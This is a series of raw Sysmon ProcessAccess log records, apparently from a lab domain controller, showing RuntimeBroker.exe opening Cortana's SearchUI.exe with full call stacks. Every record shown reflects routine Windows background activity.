12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
